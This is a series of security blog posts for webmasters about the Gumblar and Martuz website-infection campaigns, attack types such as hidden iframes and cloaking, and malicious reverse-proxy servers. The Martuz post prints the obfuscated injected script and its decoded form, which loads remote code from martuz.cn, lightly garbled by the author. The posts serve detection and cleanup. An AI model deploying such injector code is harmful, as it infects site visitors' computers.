This week the list has reached the level of 1,000+ URLs. Although it’s just a small part of all Gumblar zombie scripts, this list makes a good base for a quick analysis of Gumblar zombie URLs.

What is a Gumblar zombie script?

On some compromised websites, Gumblar creates a new file with a .php extension. A link to this file is injected to other compromised sites.

<script src=hxxp://hacked-site.com/subdirectory/zombie-script.php ></script>

This script either tries to attack web surfers’ computer silently loading binary exploit files from the same zombie site, or load yet another zombie script from a third-party zombie site.

The zombie scripts are not linked to from any existing files on the same zombie site. Their are hidden somewhere in the directory structure and have names that look very trustworthy to site owners (they usually have a name of some existing legitimate file but with a .php extension). This is why webmasters of compromised sites (Gumblars zombies) are usually completely unaware of such scripts on their sites (and as a result they are usually puzzled over why Google has blacklisted their sites and says their sites host malicious content and infect other sites). Although my list is not complete, it helps webmasters locate zombie scripts on their sites.

And the below analysis of this list reveals interesting details both about the Gumblar attack and about its zombie URLs.

Analysis

I analyzed 1042 Gumblar zombie URL.

Top level domains

The attack affects sites all over the world. My list contains sites with 73 different top level domains. Of course, .com sites (as the most wide-spread) are the most affected.

------------------- Top 10 TLDs ---------------------
1 .com 452 43.4%
2 .net 77 7.4%
3 .ru 57 5.5%
4 .org 48 4.6%
5 .hu 37 3.6%
6 .de 32 3.1%
7 .in 25 2.4%
8 .pl 23 2.2%
9 .kr 23 2.2%
10 .ar 17 1.6%
: the rest 251 24.1%


File names

1042 URLs contain 749 unique filenames. As I already told you, the names are usually a combination of a name of some existing file and a .php extension. So no wonder, the most popular name of a zombie script is index.php. However, sometimes hackers use a filename (specific to the Gumblar attack) that doesn’t match any filenames of existing files – gifimg.php. It the the second most popular name of Gumblar zombie scripts.

---------------- Top 10 Filenames -------------------
1 index.php 73 7.0%
2 gifimg.php 55 5.3%
3 contact.php 13 1.2%
4 style.php 9 0.9%
5 error_log.php 8 0.8%
6 _vti_inf.php 8 0.8%
7 LICENSE.php 8 0.8%
8 favicon.php 7 0.7%
9 .ftpquota.php 7 0.7%
10 robots.php 7 0.7%
: the rest 847 81.3%

Directories

To make zombie scripts less prominent, hackers create them in subdirectories of hacked sites. In my list of 1042 URLs I found 562 unique paths (excluding filenames) to the rogue scripts. The most popular location of Gumblar zombie scripts is the /images directory (16.5%). It’s a very good location to hide malicious files — webmasters rarely check directories with image files when they are searching for something that can contain executable code. Moreover, if a file has some benign filename (e.g. gifimg) it can be easily overlooked. Other service directories (e.g. /cgi-bin, /_vti_bin, /css, /tmp, /js) are also among popular locations.

The tenth position is empty. This means that in less than 1% of cases the zombie script was found directly in the site root directory.

----------------- Top 10 directories ----------------
1 /images 172 16.5%
2 /cgi-bin 24 2.3%
3 /_vti_bin 21 2.0%
4 /css 18 1.7%
5 /img 15 1.4%
6 /tmp 13 1.2%
7 /wp-content 12 1.2%
8 /js 10 1.0%
9 /wp-admin 10 1.0%
10 9 0.9%
: the rest 738 70.8%


Subdirectory levels

In majority of cases (91.5%), zombie scripts can be found in a subdirectory one level deep. E.g. /images/zombie.php, /tmp/zombie.php, etc. However, sometimes their location is as deep as 3 levels from site root. E.g. /_flash/_notes/vz29/zombie.php. In nine cases (<1%), zombie scripts were found in a root directory (0 levels deep)
---------- Location relative to site root -----------
1 1 level deep 953 91.5%
2 2 levels deep 56 5.4%
3 3 levels deep 24 2.3%
4 0 levels deep 9 0.9%

Web servers

Gumblar uses stolen FTP credentials to break into web sites. This means that regardless of web server technology any site is potentially vulnerable to this sort of attack (as long as webmasters use FTP). My list of Gumblar zombie URLs provide enough evidence to prove this. You can find filenames and directories specific to different web server technologies.

For example:

• .htaccess.php files — Apache
• _vti_bin directories and _vti_inf.php files — sites powered by Microsoft technologies
• WEB-INF/classes/v7j/servertest.class.php — Tomcat

“s” directories

On many websites, next to a Gumblar zombie script there is a directory called s. It contains Gumblar service and log files. If you find it on your server, make sure to delete it.

Have your say

Did you notice any other interesting patterns in the list of Gumblar zombie URLs? Your comments are welcome!

Related posts:

• List of Gumblar Zombie URLs
• Revenge of Gumblar Zombies
• Gumblar .cn Exploit – 12 Facts About This Injected Script
• 10 FTP Clients Malware Steals Credentials From

My visit to Google, Moscow last week ;)

This definition perfectly describes relationships between hackers and legitimate websites. As it often happens in real life, the host (legitimate website and its owner) may be completely unaware of parasites until the harmful effect becomes obvious (e.g. drops in traffic, lost search engine rankings, site gets blacklisted, etc. ). And it doesn’t matter how big or small your site is and how malicious the hack is – this is the sort of relationships where parasites (hackers) always win and legitimate websites always lose.

As a webmaster, you can be more effective at detecting and mitigating parasitic activities if you know how hackers can benefit from your site .

Types of website parasitism

1. Parasitism on existing site traffic
2. Parasitism on search traffic
3. Parasitism on sites search engine ranking (Black-hat SEO)
4. Parasitism on server resources

1. Parasitism on existing site traffic.

How hackers benefit from a prolonged, close association with compromised websites?
If hackers incorporate some malicious content into legitimate websites, they can expose all visitors to those sites to their attacks. This is very cost effective since the infection process is fully automated (infected computers-zombies do all the dirty work) and they get all the traffic of compromised websites for free (while it is not free for the site owners who pay for hosting, create content, pay for ads, etc.). Since the cost of website infection is very low, hackers are targeting every website regardless of its size and content. This way they have infected thousands of web sites and millions of web pages.

Examples:

• Hidden iframes – Injecting hidden malicious iframes into compromised legitimate websites is one of the most popular types of malware attacks. Invisible iframes allow to silently load exploits from “bad” sites while unsuspecting web surfers browsing visible content of infected websites. More…
  Posts about attacks that inject hidden frames
• Malicious scripts – Also a very popular type of malware attacks that allows to create hidden iframes on the fly or redirect visitors to third-party sites.
  Posts about attacks that inject malicious scripts
• Rogue web servers – server-wide hacks that hijack web server processes and serve malicious content (usually redirects to rogue sites) instead of requested web pages. Such attack may be intermittent and very hard to detect. You can read about them in the following articles:
  Goscanpark: 13 Facts About Malicious Server-Wide Meta Redirects.
  Beladen – Elusive Web Server Exploit. (information for site owners and hosting providers)
  More…

How compromised websites are harmed?

• sites get blacklisted
• lose traffic (blocked by security tools or redirected by malware)
• lose reputation when visitors see AV and Safe-Browsing warnings.
• as a result, they lose sales and revenues from ads.

2. Parasitism on search traffic

How hackers benefit from a prolonged, close association with compromised websites?

Sometimes hackers target only site visitors who come from search engines. This way they make the hack detection more difficult to site owners who rarely need search engine to open their own websites. In this case, hackers are the only ones who benefit from site owners’ efforts to improve search engine rankings.

Examples:

• .htaccess redirects – On Apache-powered sites, hackers inject conditional rewrite rules to redirect traffic from major search engine to malicious sites (usually to scareware sites).
  Posts about attacks that use malicious .htaccess redirects.
• PHP redirects – injected PHP code can redirect searchers to third-party pay-per-click search engines that share revenue with hackers (example).

How compromised websites are harmed?

• regardless of search engine rankings, compromised websites don’t receive any visitors from search engines (they are immediately redirected to third-party websites)
• eventually, sites get blacklisted
• lose natural traffic (blocked by security tools)
• lose reputation when visitors see AV and Safe-Browsing warnings in search results.
• as a result, they lose sales and revenues from ads.

3. Parasitism on sites search engine ranking (Black-hat SEO)

How hackers benefit from a prolonged, close association with compromised websites?

The more descriptive links from reputable sites point to some web page the higher its ranking for relevant keywords. This principle is abused by hackers who inject spammy links into legitimate websites to promote their shady web resources (online stores selling counterfeit and pirated goods, porn sites, scam sites). In this case, hackers benefit from existing search engine ranking (PR) and authority of the compromised sites that they share with the spammy sites.

Examples:

• Hidden links – the most simple attack that injects malicious links into legitimate webpages and uses HTML tricks to make them invisible to human visitors.
  Posts about attacks that inject hidden links
• Cloaking – more elaborate attacks, that serve different versions of web pages to normal visitors (legitimate web pages) and to search engine spiders (either modified web pages with injected spammy links or completely different spammy pages) . A lot of reputable sites have been affected by this sort of parasites:
  “Cheap Vista” or Cloaked Spam on High-Profile Sites
  Anti-Pirates Unknowingly Promote Pirates
• Rogue 301 redirects – When Google sees redirects with the 301 status code, it thinks that a website has permanently moved to another location. So it updates the site listing with the new location. Moreover, the new site automatically gains ranking of the original site. To steal ranking and search traffic from legitimate sites, hackers create conditional redirect rules (either in .htaccess files or in PHP scripts) that return the 301 status code along with the address of a malicious site for requests from search engine spiders. You can read the following posts about such attacks and their consequences:
  Exploit Redirects Googlebot to Malware Sites (Bablo me uk).
  Stats Anomaly Reveals Website Security Issues.

How compromised websites are harmed?

• The increased number of links dilutes the SEO value of web pages, which makes legitimate links less valuable SEO-wise.
• Black-hat SEO tricks inevitably lead to penalties and exclusion from search results, which usually means drop in traffic and revenues.
• Hidden links may affect contextual ads on compromised sites.
• Cloaked content makes it to site description in search results and people who search for you site name may see something like “Viagra Online – Buy Viagra Online – Cheapest Viagra On The Net” or even something pornographic next to your site link. Such thing can only harm your reputation (especially for sites of schools, churches, reputable international organizations – which I see quite often).
• Cloaked content replaces legitimate content in search index, and compromised web sites can no longer be found using relevant keywords.

4. Parasitism on server resources.

How hackers benefit from a prolonged, close association with compromised websites?

Sometimes hackers are not interested in existing content, ranking of compromised websites and their visitors. All they need is free web space and server resources – something that they can share with hacked legitimate websites whose owners unknowingly pay the bills both for themselves and for hackers.

Examples:

• Rogue pages – Deep in sub-directories of legitimate websites, hackers create thousands of web pages optimized for specific keywords to poison search results on major search engines. (usually something related to breaking news or some relatively unpopular keywords from the long tail – either way they have good chances to make it to the first page of search results). Once search engines index those rogue pages and start to send search traffic their way (it usually only take a few hours) the pages start to expose visitors to some malicious content (usually redirects to scareware sites) :
  Rogue blogs redirect search traffic to bogus AV sites. Part 1.
  Bety.php – osCommerce Hack. Part 1.
  Bety.php Hack. Part 2. Black Hats in Action.
  Internals of Rogue Blogs
• Phishing – To steal sensitive personal information hackers create rogue web pages that look exactly as login pages of banks and popular services (e.g. Facebook, PayPal, GMail, etc). When they send out tons of spam emails asking people, for example, to change their passwords (I bet you received such emails) and specifying a link to that phishing page on a hacked site. As a result of such phishing campaigns, some people may not notice the forgery and provide hackers with their logins and passwords. And the hacked sites make it into blacklists of anti-phishing organizations…
• Gumblar – One of the most elaborate malware attack – Gumblar – tries to use compromised websites to the fullest. Not only does it inject malicious scripts into legitimate web pages, it also creates subdirectories with binary exploits and malicious scripts that hackers use to infect visitors to other sites. Moreover, the backdoor scripts on infected sites are used to break into new sites and infect them. Gumblar-infected sites act as zombies of some botnet.
  Revenge of Gumblar Zombies
  List of Gumblar Zombie URLs
  More…
• Koobface – This attack, that primarily targets users of social networking sites, creates scripts in subdirectories of hacked legitimate sites that redirect victims of the attack further to malicious web pages on infected computers.
• Reverse proxies on port 8080 – To protect central malicious servers and keep them invisible to security researchers, hackers hide the real sources of badness behind reverse proxies on compromised web servers. Most hidden iframes with URLs that use port 8080 are just reverse proxies that behind the scenes pull the malicious content from secret servers.
  One of such reverse proxies
  Attacks that use such reverse proxies:
  Dynamic DNS and Botnet of Zombie Web Servers
  From Hidden Iframes to Obfuscated Scripts
  Quicksilver Malware Network

How compromised websites are harmed?

• Sites get blacklisted because of malicious content they host.
• Sites can be excluded from search results if hackers create spammy pages there.
• Sites can be marked as phishing sites.
• Everything above leads to traffic and revenue drops
• Rogue content may exhaust site quotas and slow down server performance.
• And after all, site owners pay for resource overage incurred by hacker activity.

Non-parasites

Not all hacker attacks are parasitic in their nature (which doesn’t make them less malicious, of course)

• Defacement – hackers replace/change legitimate content of websites to show everyone that the sites have been hacked. Usually it’s just a malicious mischief. It doesn’t involve prolonged and close relationship with hacked sites.
• DoS/DDos attacks – denial-of-service attacks try to render targeted websites/servers unavailable, exhausting their computational resources with floods of external requests. The goal of such attacks is usually either to get rid off unwanted sites (competitors, rivals, etc.) or to have site owners pay some ransom to stop the attack. While DoS attack may be quite prolonged (and last several weeks), they are completely external and don’t involve any close association with the the targeted sites.
• Theft – Sometimes hackers break into websites to steal some protected information (e.g. database of clients) or access premium content without paying for it.

Make knowledgeable decisions

Now that you know why hackers break into legitimate websites and how they use them, you can make knowledgeable decisions about how to detect the hacks and what tools you should use. E.g. to find injected iframes and malicious scripts you should thoroughly look through the HTML code of your web pages; to detect cloaking, you should check what Google has indexed on your site; to detect redirects from search results, you should try to spoof the Referer HTTP header with tools like wget, etc.

Unmask Parasites

To provide webmasters with a more universal, quick and secure way to check their sites for signs of hacker activity I created Unmask Parasites online service. It evolved during the last two years and proved to be a good starting point for detecting various types of website parasites: hidden links, iframes, malicious scripts, cloaking and conditional redirects.

It’s the tool that can help reveal the problem you were not aware of or provide a hint on where to look (or not to look) for the source of security problems you investigate. And it’s all in less than 30 seconds. Of course, Unmask Parasites can’t detect or correctly identify every security problem, but it’s just a first step in your investigation and you should have other more specialized tools in your toolkit as well.

If you haven’t tried Unmask Parasites yet, it’s time to click this link and check your site for parasites.

Build awareness

Did you learn anything new about website security threats? If yes, show this article to your fellow webmasters. The more we – webmasters – know about hackers, the less chance they have of exploiting our sites behind our backs.

Have your say

Do you have any other examples of parasitic activities of hackers? I would love to hear about them. Your comments are welcome.

Related posts:

• Let’s Unmask Parasites
• Unmask Parasites. A Year of Blogging
• Vulnerability Advisories for Third-Party Scripts
• 10 FTP Clients Malware Steals Credentials From

LeaseWeb reaction

Fortunately, such posts sometimes make difference. The same day Alex de Joode, LeaseWeb’ Security Officer, left a comment, explaining their company’s abuse handling policy and showing that they were ready to address malware issues. What more important is I can see the results: mdvhost.com domain name no longer resolve. And none of the malicious domains is currently mapped to IP addresses on the LeaseWeb network. Thanks Alex! And thanks Maxim Weinstein (StopBadware.org) who helped to draw attention to this issue.

The attack is still active

The loss of the mdvhost .com server didn’t stop the attack though. Apparently, hackers have back-up servers to replace the missing one. Anyway, this switch requires reconfiguring reverse-proxies and have probably slowed down the propagation of the malware. And by the way, in the beginning of this week I noticed a temporary decrease in this attack detection in Unmask Parasites. Or was it just a coincidence?

However, the attack is still active. Currently, malicious servers reside mostly on OVH network and on some German networks (for some reason hackers choose European hosting providers)

Here is a sample output of the dig command:

viewhomesale.ru. 432 IN A 85.25.73.243 Germany Berlin Bsb-service Gmbh
viewhomesale.ru. 432 IN A 91.121.49.129 France Paris Ovh Sas
viewhomesale.ru. 432 IN A 94.23.14.110 France Clermont-ferrand Ovh Sas
viewhomesale.ru. 432 IN A 94.23.89.95 Poland Ovh Sp. Z O. O
viewhomesale.ru. 432 IN A 94.23.206.229 France Ovh Sas

Some more IPs:

62.75.184.40 Germany Berlin Vserver – Virtual Dedicated Server-hosting
77.37.19.43 Germany Star-hosting E.k. – Vserver I
91.121.142.111 France Paris Ovh Sas
188.72.199.24 Germany Berlin De-netdirect
213.186.57.19  France Paris Ovh Sas

I hope OVH and the German hosting providers will follow LeaseWeb and finally sweep hackers away from their networks.

To hosting providers

The IPs in this post belong to compromised dedicated and virtual dedicated servers where hackers managed to install nginx on port 8080 (they work as reverse-proxies). It would be great if you find the nginx configuration files and determine the address of the central site where they get all the malicious stuff from. You can either post your findings here or contact me directly. Alternatively, you can contact the hosting provider of that malicious server yourselves.

P.S. Happy New Year!

Related posts:

• From Hidden Iframes to Obfuscated Scripts
• Dynamic DNS and Botnet of Zombie Web Servers
• Evolution of Hidden Iframes
• 10 FTP Clients Malware Steals Credentials From

Working on Unmask Parasites service, I could easily spot prevalent threats and trends in malware attacks. I used this information to help webmasters of hacked sites on various security-related forums and news groups. However, forum format assumes that you answer similar questions again and again, which is very inefficient. That’s why I decided to publish information about prevalent website security problems here. This way I could write detailed information once and then just link to my articles in my forum answers.

This approach worked great for me. The very first post about .htaccess redirects to bogus anti-virus sites became pretty popular. I didn’t have to waste my time duplicating the same answers again and again (there were several questions a day from owners of affected sites that time. One year later, there are still many sites hacked this way). Soon enough, my posts started to attract visitors from search engines. As a result, one blog post could help much more webmasters than several similar posts on specialized forums.

Helping webmasters

My blog is not an average security blog that talks about new threats. It is not for security specialists (they usually know more than me about the topics I cover here). It is for webmasters who want to keep their site secure. For people who work hard to build their websites and then find out that all their efforts can be easily ruined by hackers. In my posts about hacker attacks, I try to include information about how to detect breaches, clean up web sites, remove malware warnings, and prevent future break-ins. I also try to explain what makes those attacks possible and why hackers target legitimate web sites.

And even if I don’t have some information about a specific attack, I always encourage my readers to share their information in comments. This worked particularly well for posts about Gumblar and Goscanpark meta redirects, where comments sections are probably more informative than the posts themselves. Thanks guys.

Security problems of a security blog

While most of my posts are based on the information I collect investigating security issues of third-party sites, there had been a real security problem with my own blog. It was originally hosted on a shared server that happened to be hacked (not my blog, but the whole server) back in May. It was a nasty elusive problem that my hosting provider couldn’t resolve for almost two weeks. Finally, we managed to locate the malicious process and the backdoor script.

To share details about this incident, I posted an article about the Beladen exploit, which happened to affect many other shared web servers too. This was a lesson for me: in a shared hosting environment your site’s security depends on security of other websites hosted on the same server. As a result, I moved my blog from a shared hosting to a virtual private server (VPS) where I can control (virtually) everything. Of course, now I pay more money for the blog hosting and have to maintain the server myself, but I’m much more confident that my blog is not dangerous for my readers (I take it seriously).

False positives

There had also been a problem with false warnings from certain anti-virus programs. Quite frustrating to see anti-virus programs with flaws in detection algorithms keeping webmasters away from the articles that could help them remove malware from their sites and stop infecting their site visitors’ computers.

In my articles, I post snippets of malicious code that hackers inject into legitimate web pages. I don’t post screenshots of the malicious code like many other security blog do. The purpose of my articles is to help webmasters of compromised blogs resolve their security issues. So I want them to be able to find my blog when they Google for parts of suspicious code they find inside their web pages. Many webmasters find my blog this way.

I realize the danger of the malicious code that I post. That’s why I slightly garble it, making it non-executable if copy-pasted into HTML. Nonetheless, some anti-virus programs confuse such code with real malicious code (their detection algorithms are imperfect). After each report about false positives from my blog readers, I had to garble code samples even more until the false warnings went away.

Reader contributed information.

For my posts, I investigate every case myself. However, I can’t gather complete information without internal access to compromised websites (I’m not a hacker and never break into third-party websites). That’s why I’d like to thank people (webmasters, hosting providers, security researchers, etc.) who email me and share internal details about the hacks. Your help is indispensable.

Readers’ comments are also a very important part of this blog. They usually add missing bits to my posts. Sometimes comments sections are more informative than corresponding articles. That’s great! I’m glad to provide a place for fruitful discussions.

I’d also like to thank my readers who allowed me to post their emails on my blog. Here are the two articles based on their emails:

• Stats Anomaly Reveals Website Security Issues
• Quicksilver Malware Network

If you want to see your articles published on this blog, don’t hesitate to contact me. Guest post are welcome!

In the news

Several posts from this blog have made it into major press. You can find references to my articles on sites of the New York Times, Washington Post, The Register, CNet, ComputerWorld, SC Magazine, etc. (click here for the full list) Internet security community (e.g. StopBadware.org, Google Online Security blog, IBM Internet Security Systems, Sophos, etc) also actively links to this blog. I consider it as a proof of the quality of the original content that I post here.

Stats and facts.

So a year has passed. Looking back, I can share some interesting (or maybe boring) stats and facts.

60 posts in 5 categories (114 tags)

122,000+ visits from 178 countries (literally from all over the world), but mainly from the United States (30%), United Kingdom (8%) and India (6%).

41% of visitors came from search engines (mainly from Google – 97%)

1,800+ sites referred visitors to this blog.

The most active referrers were:

• Google Webmaster Forums
• Unmask Parasites
• heise.de (after the post about the botnet of compromised web servers)
• StumbleUpon
• TheRegister
• Reddit
• Slashdot
• Sophos

Most popular keywords that sent me visitors from search engines:

• gumblar
• gumblar .cn
• martuz .cn
• martuz
• gifimg.php

They are all related to the Gumblar attack and account for 13,000+ visits.

No wonder, my original article about Gumblar is the most visited article on this blog (55,000+ visits). If I sum up visits to all my articles about Gumblar, it will be almost 79,000 visits. The new incarnation of the Gumblar attack is still active so this statistics will only increase.

The second most visited article is Malicious “Income” IFrames from .CN Domains – 21,000+ visits. It was my first article about the iframe injection attack that uses stolen FTP credentials. This attack evolved over the time and I frequently posted updates. All posts on this topic have been visited more than 40,000 times.

Among other popular topics are redirects to scareware sites and Beladen/Goscanpark server-wide exploits.

750+ approved comments

Most discussed posts:

• Gumblar .cn Exploit – 12 Facts About This Injected Script – 184 comments
• Goscanpark: 13 Facts About Malicious Server-Wide Meta Redirects – 83 comments
• Malicious “Income” IFrames from .CN Domains – 77 comments
• Dynamic DNS and Botnet of Zombie Web Servers – 41 comments

News feed: Feedburner currently reports about 450 subscribers. Not bad for a specialized blog. If you have a site that you want to protect from hackers or you are simply into website security, consider subscribing too. You can read this blog updates in your favorite RSS reader or in your good old email client. You can also follow me on Twitter.

Looking into the future

I actively develope Unmask Parasites and participate in various security forums, so there is no shortage of topics to cover here. If I had enough time I would post interesting information every day. However, in real world, many posts take at least 2-3 days of research, sometimes a few weeks, so I struggle to publish at least 2-3 original posts a month.

Hope I’ll be able to find enough time and incentive to keep on blogging at this pace. And if you want to see me motivated, please provide your feedback: leave comments, suggest topics, ask questions, share your information, and spread the word — this helps me concentrate on blogging ;-)

Read my blog. Keep your sites secure.

Your,
Denis Sinegubko

Related posts:

• Happy Birthday Unmask Parasites!
• Let’s Unmask Parasites

If you like this blog, you might also want to check my free online service called Unmask Parasites. It helps webmasters solve security problems revealing hidden illicit content in their web pages.

This week Google announced that they are working on a new open source, lightweight operating system that will initially be targeted at netbooks – Google Chrome OS. That’s right. It’s a Google Chrome browser running on top of Linux kernel. Netbooks running Google Chrome OS should be available in the second half of 2010. (BTW, will European Union rule Google exclude Google Chrome browser from the default installation of a Google Chrome OS? )

They are going to completely redesign the underlying security architecture of the OS so that users don’t have to deal with viruses, malware and security updates. As far as I understand the concept, everything should be stored and executed on the web, so traditional malware won’t work on such a OS. On the other hand, I envision criminals somehow make Chrome users subscribe to their malicious web services.

Gazelle browser

Another interesting project is the Microsoft’s Gazelle browser. This is a web browser that uses OS principles to isolate web application from each other and from the underlying host operating system. Effectively this browser is an OS  itself (with it’s own kernel and resources) running on top of the real operating system.  This architecture ensures that any misbehaving code (script, virus, buggy plug-in) affects only it’s own process, leaving other web applications, the browser kernel, and the host system intact.  Malware can’t jailbreak and infect your computer. It’s like Vegas (what happens in Vegas stays in Vegas). They definitely should have called this browser Vegas.

Anyway, it’s only a proof-of-concept research project and it may take years before something like this will be publicly available.

The future

These new projects (operating system as a web browser from Google, and web browser as an operating system from Microsoft) can make a revolution in computer security. Traditional desktop malware will become obsolete. It will be replaced by a new generation of web based malware.  Many antivirus companies may go out of business.

… and the present

You don’t have to wait another year to try this sort of secure web browsing. Something similar has been available for years. I’m talking about virtual machines. For example when I’m working in Windows XP, I I have a Linux guest operating system running in a window specifically to browse the web. Linux is less prone to malware attacks and it is isolated from my Windows. For me, it’s a combination of Google Chrome OS and Microsoft Gazelle. In this guest OS, where Firefox runs on top of a Linux kernel, “most of the user experience takes place on the web” and on the other hand my web browser is works in a stand-alone operating system, isolated from the host OS.

He received an email from Google saying that his site had been temporarily removed from search index because it contained hidden spam links and thus violated Google’s guidelines.

In the article you will read how Unmask Parasites helped reveal those hidden links, how they were removed, how the penalty affected search engine traffic, and what lesson about website security have been learnt, i.e:

• Signs that your site is hacked.
• Why hackers inject hidden links?
• How to protect WordPress blogs?

Note that the article is written by a marathon runner. And you don’t have to be a computer genius to protect your website either. But if your site is important to you, be sure to invest some time and learn some basics about website security. It may cost you much more (in terms of time and money) when you find your site blocked because of security issues.

This guy’s words apply to most of us:

When I started blogging I didn’t expect to find myself learning about internet security. Learning never ceases and it feels good to be empowered.

If you are convinced, here is a great article from Google: Best practices agains hacking. While it’s beginning looks a bit techie, the rest of the article provides valuable information for all site owners. Be sure to read the “Some resources about CMSs security“, “Some ways to identify the hacking of your site” and “Hacked behavior removed, now what?” sections of this article.

Another advice is regularly check your web sites for security issues. If you detect a problem and fix it before Google finds it, the damage will be minimal.

You can use my Unmask Parasites free online service for quick rough checks. It scans web pages and reveals illicit content and behavior such as hidden spam links, invisible iframes, suspicious scripts and unwanted redirections.

Have your say

Please share your thoughts about what makes people start learning about website security. Suggest security resource and “best practices” for newbie site owners. Your comments are welcome.

Similar posts:

• Let’s Unmask Parasites
• BadwareBusters.org Out of Beta

To have more things under my control I moved this blog from a shared hosting plan to a VPS (virtual private server).

However, when I imported WordPress posts to the new location, things didn’t go as expected and the structure of threaded comments got broken. When you read popular posts with active discussions, you might not be able to identify who responding to whom. In new posts, threaded comments should be working.
I’m trying to figure out if I can resolve the issue. Does anyone have experience moving a WordPress (2.7.1) blog with threaded comments to a new site?

If you find any other glitches, please contact me either via this blog or via Unmask Parasites contact form.

Update (a few hours later): RTFM! I found this Codex article about moving WordPress.  Restoring MySQL database from a full dump worked much better (in terms of preserving structure of threaded comments) than simple “Export/Import”.  There might be issues with plugins if they store absolute paths in a database though.

Similar posts:

• Security Issues With the Blog

The Unmask Parasites online service was not affected (it is hosted in a different location, and is very secure). It worked all that time. And during the investigation, my blog redirected visitors to http://www.UnmaskParasites.com

I’d like to thank Googlers (John Mueller, Oliver Fisher and Oxana Comanescu) who provided me with details about the issue. The malicious code had been noticed only in a small percentage of server responses (hackers don’t want to be unmasked). I could never reproduce it myself.

My blog is hosted on a simple shared plan since it doesn’t require anything fancy. I combed though my whole account and couldn’t locate any sign of the compromise or any alien code.

I contacted my hosting provider and provided them with all the information I had. They were very responsive and had been investigating the issue for the rest of the day. They took some preventive measures and added traffic filtering so I hope my blog is currently pretty much safe.

Anyway, you shouldn’t trust even sites like mine. Make sure you are browsing the web with a secure browser. If you are on Windows, consider using Google Chrome (it warns if a site references something from blacklisted third-party sites) or FireFox with the NoScript extension. With NoScript, you can enable scripts on legitimate domains that you visit, but any third-party scripts (and most website exploits require loading scripts from third-party domains) will be blocked.

When I have all the details from my hosting provider, I’ll review the issue.

Moving to VPS

Meanwhile I consider moving my blog from shared hosting to a VPS (virtual private server), so that I have full control over the things behind the scenes.

I’m not much of a sysadmin, so I’ll need some getting started tutorials about how to keep the server secure.

Can anyone suggest a supportive and reliable hosting provider with affordable VPS plans? I don’t need anything fancy: Apache, MySql, PHP, Wordpress. I guess 256Mb RAM would be enough.

It would also be great if someone could support Unmask Parasites and this blog and help me purchase a VPS.

Feel free to leave your comments here or contact me directly.

Many people have noticed that “gumblar .cn” no longer resolve. The site cannot be accessed. Thus the gumblar script is no longer able to load the malicious payload and infect new computers and websites. Great!

Meet the Martuz

The loss of the gumblar .cn domain name can’t stop hackers. They have slightly modified the script and now inject a new version that loads malicious content from a new domain – martuz .cn (95 .129 .145 .58)

The script

(function(){var G33z1='%';var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();

The script looks and acts the same as the gumblar script. All facts we know about the Gumblar apply to Martuz as well. And the removal instructions should be the same.

What’s new?

This is the decoded version of the script

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.w rite("<script src=//martu"+"z.cn/vid/?id="+j+"><\/script>");}

As you can see, this code injects an external script that loads content from “martuz.cn”

The Martuz version of the script is slightly more sophisticated.

Hackers made it more difficult to identify the script even when you decode it. They now split the domain name and have the script concatenate the parts: “martu”+”z.cn”, “mart”+”uz.cn”, etc. Simple scripts that search for “martuz.cn” may not detect the script.

Martuz vs Google Chrome

In Gumblar, hackers only wanted to load the script on Windows machines with version of Windows prior Vista (NT 6). In Martuz, they added a new check and no longer load the external script in a Google Chrome browser. I guess hackers read multiple forums and noticed that many webmasters used Google Chrome to detect the malicious code (Chrome detects calls to blacklisted sites and warns users). Now, if a webmaster loads an infected web sites in Chrome, there will be no warning since the external code won’t load. And the webmaster may mistakenly think that the site is clean and no additional removal action is required.

Don’t count on Google Chrome (and Safari) warnings. As you can see, hackers can make their code unnoticeable. And they can use new domain names every day, so that even if Chrome detects calls to the new malicious sites, it won’t warn you since those site are not blacklisted yet.

Make sure to check the source code of web pages. Or check web pages with my Unmask Parasites – it detects suspicious scripts without executing them.

What’s next?

Now that we all know how fast Gumblaroids (Gumblar-type exploits) can spread and how difficult to remove them from web sites and local computers, the Martuz incarnation should be shut down very soon. But I don’t think hackers will give up. We should be ready for new malicious domains and more and more sophisticated scripts.

And don’t forget hackers still have a big database of compromised FTP credentials and a lot of sites with hidden backdoor scripts that they can still use. And I’m sure they’ll use them.

Let’s discuss the issue.

If you have any additional information about the Martuz incarnation of the exploit or want to share your thoughts about Gumblaroids, please leave your comments below.

Similar posts:

• Gumblar .cn Exploit – 12 Facts About This Injected Script
• A Few More Facts About the Gumblar Attack From SophosLab and ScanSafe.
• All reviewed website exploits